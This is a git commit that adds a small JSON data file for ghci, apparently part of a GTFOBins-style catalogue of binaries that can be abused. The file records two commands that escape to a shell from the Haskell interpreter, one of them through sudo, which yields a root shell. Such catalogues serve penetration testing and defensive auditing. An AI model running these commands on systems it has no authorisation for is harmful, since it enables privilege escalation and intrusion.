add data source for ghci

master
Mr. Robot 4 years ago committed by GitHub
parent 780e332421
commit db2c72e536
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,14 @@
{
"functions": {
"shell": [
{
"code": "ghci\nSystem.Process.callCommand \"/bin/sh\"\n"
}
],
"sudo": [
{
"code": "sudo ghci\nSystem.Process.callCommand \"/bin/sh\"\n"
}
]
}
}
Loading…
Cancel
Save